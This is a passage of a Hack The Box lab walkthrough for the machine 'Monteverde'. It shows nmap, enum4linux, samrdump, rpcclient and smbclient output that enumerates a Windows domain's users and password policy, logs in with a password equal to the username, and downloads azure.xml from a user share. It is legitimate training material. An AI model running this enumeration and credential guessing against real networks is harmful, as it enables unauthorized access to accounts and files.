HTB Monteverde Walkthrough

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748nmap -sV -sC -p- -oA monteverde.nmap 10.10.10.172Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-30 08:08 CSTNmap scan report for 10.10.10.172Host is up (0.043s latency).Not shown: 65516 filtered portsPORT      STATE SERVICE       VERSION53/tcp    open  domain?| fingerprint-strings: |   DNSVersionBindReqTCP: |     version|_    bind88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-01-30 14:20:09Z)135/tcp   open  msrpc         Microsoft Windows RPC139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)445/tcp   open  microsoft-ds?464/tcp   open  kpasswd5?593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636/tcp   open  tcpwrapped3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)3269/tcp  open  tcpwrapped5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found9389/tcp  open  mc-nmf        .NET Message Framing49667/tcp open  msrpc         Microsoft Windows RPC49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.049670/tcp open  msrpc         Microsoft Windows RPC49673/tcp open  msrpc         Microsoft Windows RPC49699/tcp open  msrpc         Microsoft Windows RPC49771/tcp open  msrpc         Microsoft Windows RPC1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port53-TCP:V=7.80%I=7%D=1/30%Time=5E32E3C7%P=x86_64-pc-linux-gnu%r(DNSVSF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\SF:x04bind\0\0\x10\0\x03");Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: 9m58s| smb2-security-mode: |   2.02: |_    Message signing enabled and required| smb2-time: |   date: 2020-01-30T14:22:29|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 380.55 seconds

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159enum4linux -a 10.10.10.172Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jan 30 08:17:35 2020 ==========================|    Target Information    | ==========================Target ........... 10.10.10.172RID Range ........ 500-550,1000-1050Username ......... ''Password ......... ''Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ====================================================|    Enumerating Workgroup/Domain on 10.10.10.172    | ====================================================[E] Can't find workgroup/domain ============================================|    Nbtstat Information for 10.10.10.172    | ============================================ Looking up status of 10.10.10.172No reply from 10.10.10.172 =====================================|    Session Check on 10.10.10.172    | ===================================== [+] Server 10.10.10.172 allows sessions using username '', password ''[+] Got domain/workgroup name: ===========================================|    Getting domain SID for 10.10.10.172    | =========================================== Domain Name: MEGABANKDomain Sid: S-1-5-21-391775091-850290835-3566037492[+] Host is part of a domain (not a workgroup) ======================================|    OS information on 10.10.10.172    | ====================================== [+] Got OS info for 10.10.10.172 from smbclient:[+] Got OS info for 10.10.10.172 from srvinfo:Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED =============================|    Users on 10.10.10.172    | =============================index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2    Name: AAD_987d7f2f57d2      Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos    Name: Dimitris Galanos    Desc: (null)index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domainindex: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope    Name: Mike Hope    Desc: (null)index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary    Name: Ray OLeary    Desc: (null)index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs    Desc: (null)index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan    Name: Sally Morgan    Desc: (null)index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata    Name: svc-ata    Desc: (null)index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec    Name: svc-bexec    Desc: (null)index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp    Name: svc-netapp    Desc: (null)user:[Guest] rid:[0x1f5]user:[AAD_987d7f2f57d2] rid:[0x450]user:[mhope] rid:[0x641]user:[SABatchJobs] rid:[0xa2a]user:[svc-ata] rid:[0xa2b]user:[svc-bexec] rid:[0xa2c]user:[svc-netapp] rid:[0xa2d]user:[dgalanos] rid:[0xa35]user:[roleary] rid:[0xa36]user:[smorgan] rid:[0xa37] =========================================|    Share Enumeration on 10.10.10.172    | =========================================         Sharename       Type      Comment        ---------       ----      -------SMB1 disabled -- no workgroup available[+] Attempting to map shares on 10.10.10.172 ====================================================|    Password Policy Information for 10.10.10.172    | ==================================================== [+] Attaching to 10.10.10.172 using a NULL share[+] Trying protocol 445/SMB...[+] Found domain(s):        [+] MEGABANK        [+] Builtin[+] Password Info for Domain: MEGABANK        [+] Minimum password length: 7        [+] Password history length: 24        [+] Maximum password age: 41 days 23 hours 53 minutes        [+] Password Complexity Flags: 000000                [+] Domain Refuse Password Change: 0                [+] Domain Password Store Cleartext: 0                [+] Domain Password Lockout Admins: 0                [+] Domain Password No Clear Change: 0                [+] Domain Password No Anon Change: 0                [+] Domain Password Complex: 0        [+] Minimum password age: 1 day 4 minutes        [+] Reset Account Lockout Counter: 30 minutes        [+] Locked Account Duration: 30 minutes        [+] Account Lockout Threshold: None        [+] Forced Log off Time: Not Set[+] Retieved partial password policy with rpcclient:Password Complexity: DisabledMinimum Password Length: 7 ==============================|    Groups on 10.10.10.172    | ============================== [+] Getting builtin groups:group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]group:[Incoming Forest Trust Builders] rid:[0x22d]group:[Windows Authorization Access Group] rid:[0x230]group:[Terminal Server License Servers] rid:[0x231]group:[Users] rid:[0x221]group:[Guests] rid:[0x222]group:[Remote Desktop Users] rid:[0x22b]group:[Network Configuration Operators] rid:[0x22c]group:[Performance Monitor Users] rid:[0x22e]group:[Performance Log Users] rid:[0x22f]group:[Distributed COM Users] rid:[0x232]group:[IIS_IUSRS] rid:[0x238]group:[Cryptographic Operators] rid:[0x239]group:[Event Log Readers] rid:[0x23d]group:[Certificate Service DCOM Access] rid:[0x23e]group:[RDS Remote Access Servers] rid:[0x23f]group:[RDS Endpoint Servers] rid:[0x240]group:[RDS Management Servers] rid:[0x241]group:[Hyper-V Administrators] rid:[0x242]group:[Access Control Assistance Operators] rid:[0x243]group:[Remote Management Users] rid:[0x244]group:[Storage Replica Administrators] rid:[0x246][+] Getting builtin group memberships:Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDsGroup 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDsGroup 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDsGroup 'Guests' (RID: 546) has member: Couldn't lookup SIDsGroup 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDsGroup 'Users' (RID: 545) has member: Couldn't lookup SIDs

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109python samrdump.py 10.10.10.172Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation                                                          [*] Retrieving endpoint list from 10.10.10.172Found domain(s):               . MEGABANK . Builtin                                  [*] Looking up users in domain MEGABANK  Found user: Guest, uid = 501 Found user: AAD_987d7f2f57d2, uid = 1104Found user: mhope, uid = 1601  Found user: SABatchJobs, uid = 2602  Found user: svc-ata, uid = 2603      Found user: svc-bexec, uid = 2604Found user: svc-netapp, uid = 2605Found user: dgalanos, uid = 2613             Found user: roleary, uid = 2614           Found user: smorgan, uid = 2615Guest (501)/FullName:                     Guest (501)/UserComment:     Guest (501)/PrimaryGroupId: 514    Guest (501)/BadPasswordCount: 0    Guest (501)/LogonCount: 0    Guest (501)/PasswordLastSet: <never>Guest (501)/PasswordDoesNotExpire: True    Guest (501)/AccountIsDisabled: True     Guest (501)/ScriptPath:AAD_987d7f2f57d2 (1104)/FullName: AAD_987d7f2f57d2AAD_987d7f2f57d2 (1104)/UserComment: AAD_987d7f2f57d2 (1104)/PrimaryGroupId: 513AAD_987d7f2f57d2 (1104)/BadPasswordCount: 1AAD_987d7f2f57d2 (1104)/LogonCount: 9AAD_987d7f2f57d2 (1104)/PasswordLastSet: 2020-01-02 16:53:24.984897AAD_987d7f2f57d2 (1104)/PasswordDoesNotExpire: TrueAAD_987d7f2f57d2 (1104)/AccountIsDisabled: FalseAAD_987d7f2f57d2 (1104)/ScriptPath: mhope (1601)/FullName: Mike Hope     mhope (1601)/UserComment:   mhope (1601)/PrimaryGroupId: 513  mhope (1601)/BadPasswordCount: 0  mhope (1601)/LogonCount: 2  mhope (1601)/PasswordLastSet: 2020-01-02 17:40:05.908924mhope (1601)/PasswordDoesNotExpire: True  mhope (1601)/AccountIsDisabled: False  mhope (1601)/ScriptPath:SABatchJobs (2602)/FullName: SABatchJobs [71/354]SABatchJobs (2602)/UserComment:SABatchJobs (2602)/PrimaryGroupId: 513SABatchJobs (2602)/BadPasswordCount: 0SABatchJobs (2602)/LogonCount: 0SABatchJobs (2602)/PasswordLastSet: 2020-01-03 06:48:46.392235SABatchJobs (2602)/PasswordDoesNotExpire: TrueSABatchJobs (2602)/AccountIsDisabled: FalseSABatchJobs (2602)/ScriptPath:svc-ata (2603)/FullName: svc-atasvc-ata (2603)/UserComment:svc-ata (2603)/PrimaryGroupId: 513svc-ata (2603)/BadPasswordCount: 0svc-ata (2603)/LogonCount: 0           svc-ata (2603)/PasswordLastSet: 2020-01-03 06:58:31.332169svc-ata (2603)/PasswordDoesNotExpire: Truesvc-ata (2603)/AccountIsDisabled: Falsesvc-ata (2603)/ScriptPath:svc-bexec (2604)/FullName: svc-bexecsvc-bexec (2604)/UserComment:svc-bexec (2604)/PrimaryGroupId: 513svc-bexec (2604)/BadPasswordCount: 0svc-bexec (2604)/LogonCount: 0svc-bexec (2604)/PasswordLastSet: 2020-01-03 06:59:55.863422svc-bexec (2604)/PasswordDoesNotExpire: Truesvc-bexec (2604)/AccountIsDisabled: Falsesvc-bexec (2604)/ScriptPath:svc-netapp (2605)/FullName: svc-netapp  svc-netapp (2605)/UserComment:svc-netapp (2605)/PrimaryGroupId: 513svc-netapp (2605)/BadPasswordCount: 0svc-netapp (2605)/LogonCount: 0svc-netapp (2605)/PasswordLastSet: 2020-01-03 07:01:42.786264svc-netapp (2605)/PasswordDoesNotExpire: Truesvc-netapp (2605)/AccountIsDisabled: Falsesvc-netapp (2605)/ScriptPath:dgalanos (2613)/FullName: Dimitris Galanosdgalanos (2613)/UserComment:dgalanos (2613)/PrimaryGroupId: 513dgalanos (2613)/BadPasswordCount: 0dgalanos (2613)/LogonCount: 0dgalanos (2613)/PasswordLastSet: 2020-01-03 07:06:10.519660dgalanos (2613)/PasswordDoesNotExpire: True         dgalanos (2613)/AccountIsDisabled: Falsedgalanos (2613)/ScriptPath:roleary (2614)/FullName: Ray O'Learyroleary (2614)/UserComment:roleary (2614)/PrimaryGroupId: 513roleary (2614)/BadPasswordCount: 0roleary (2614)/LogonCount: 0roleary (2614)/PasswordLastSet: 2020-01-03 07:08:05.832167         roleary (2614)/PasswordDoesNotExpire: Trueroleary (2614)/AccountIsDisabled: Falseroleary (2614)/ScriptPath:smorgan (2615)/FullName: Sally Morgansmorgan (2615)/UserComment: smorgan (2615)/PrimaryGroupId: 513smorgan (2615)/BadPasswordCount: 0smorgan (2615)/LogonCount: 0smorgan (2615)/PasswordLastSet: 2020-01-03 07:09:21.629084 smorgan (2615)/PasswordDoesNotExpire: Truesmorgan (2615)/AccountIsDisabled: Falsesmorgan (2615)/ScriptPath: [*] Received 10 entries.

123rpcclient -U "MEGABANK\SABatchJobs" 10.10.10.172Enter MEGABANK\SABatchJobs's password: SABatchJobsrpcclient $>

1234567891011121314151617181920212223242526272829rpcclient $> lookupnames mhopemhope S-1-5-21-391775091-850290835-3566037492-1601 (User: 1)rpcclient $> queryuser 1601        User Name   :   mhope        Full Name   :   Mike Hope        Home Drive  :   \\monteverde\users$\mhope        Dir Drive   :   H:        Profile Path:        Logon Script:        Description :        Workstations:        Comment     :        Remote Dial :        Logon Time               :      Fri, 31 Jan 2020 10:18:59 CST        Logoff Time              :      Wed, 31 Dec 1969 18:00:00 CST        Kickoff Time             :      Wed, 13 Sep 30828 21:48:05 CDT        Password last set Time   :      Thu, 02 Jan 2020 17:40:06 CST        Password can change Time :      Fri, 03 Jan 2020 17:40:06 CST        Password must change Time:      Wed, 13 Sep 30828 21:48:05 CDT        unknown_2[0..31]...        user_rid :      0x641        group_rid:      0x201        acb_info :      0x00000210        fields_present: 0x00ffffff        logon_divs:     168        bad_password_count:     0x00000000        logon_count:    0x00000002        padding1[0..7]...        logon_hrs[0..21]...

12345678910111213smbclient \\\\10.10.10.172\\users$ -U MEGABANK/SABatchJobsEnter MEGABANK\SABatchJobs's password: SABatchJobsTry "help" to get a list of possible commands.smb: \> ls  .                                   D        0  Fri Jan  3 07:12:48 2020  ..                                  D        0  Fri Jan  3 07:12:48 2020  dgalanos                            D        0  Fri Jan  3 07:12:30 2020  mhope                               D        0  Fri Jan  3 07:41:18 2020  roleary                             D        0  Fri Jan  3 07:10:30 2020  smorgan                             D        0  Fri Jan  3 07:10:24 2020                524031 blocks of size 4096. 519955 blocks available

123456smb: \mhope\> ls  .                                   D        0  Fri Jan  3 07:41:18 2020  ..                                  D        0  Fri Jan  3 07:41:18 2020  azure.xml                          AR     1212  Fri Jan  3 07:40:23 2020                524031 blocks of size 4096. 519955 blocks available

12smb: \mhope\> get azure.xmlgetting file \mhope\azure.xml of size 1212 as azure.xml (7.1 KiloBytes/sec) (average 7.1 KiloBytes/sec)